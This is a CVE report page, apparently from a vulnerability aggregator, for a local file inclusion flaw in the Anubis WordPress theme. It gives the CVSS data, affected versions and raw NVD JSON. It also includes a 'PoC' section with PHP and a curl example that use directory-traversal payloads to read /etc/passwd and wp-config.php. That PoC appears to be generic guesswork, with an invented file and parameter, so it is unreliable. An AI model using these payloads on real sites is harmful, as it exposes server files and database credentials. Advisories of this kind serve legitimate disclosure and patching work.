Security Vulnerability Report
中文
CVE-2025-58933 CVSS 8.1 HIGH

CVE-2025-58933

Published: 2025-12-18 08:16:01
Last Modified: 2026-04-27 20:16:20

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Anubis anubis allows PHP Local File Inclusion.This issue affects Anubis: from n/a through <= 1.25.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:axiomthemes:anubis:*:*:*:*:*:wordpress:*:* - VULNERABLE
Anubis主题 <= 1.25

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-58933 PoC - Anubis Theme Local File Inclusion * Target: axiomthemes Anubis WordPress Theme <= 1.25 * Vulnerability: Improper Control of Filename for Include/Require Statement */ // LFI PoC - Read local files $target_url = "http://target-site.com/wp-content/themes/anubis/some-file.php"; // Read /etc/passwd $exploit_url_lfi = $target_url . "?file=../../../../etc/passwd"; // Read wp-config.php $exploit_url_wpconfig = $target_url . "?file=../../../../wp-config.php"; // Directory traversal to root $exploit_url_root = $target_url . "?file=../../../../../../index.php"; echo "CVE-2025-58933 LFI PoC\n"; echo "Target: " . $target_url . "\n"; echo "\nLFI Payloads:\n"; echo "1. Read /etc/passwd:\n" . $exploit_url_lfi . "\n\n"; echo "2. Read wp-config.php:\n" . $exploit_url_wpconfig . "\n\n"; echo "3. Read index.php:\n" . $exploit_url_root . "\n"; /** * HTTP Request Example (curl): * curl -i 'http://target-site.com/wp-content/themes/anubis/some-file.php?file=../../../../etc/passwd' * * Expected Response: Content of /etc/passwd file */ ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58933", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:00.807", "lastModified": "2026-04-27T20:16:20.110", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Anubis anubis allows PHP Local File Inclusion.This issue affects Anubis: from n/a through <= 1.25."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:axiomthemes:anubis:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "1.25", "matchCriteriaId": "055AEDD9-BD75-44BD-8E6F-082C232E9B9D"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/anubis/vulnerability/wordpress-anubis-theme-1-25-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}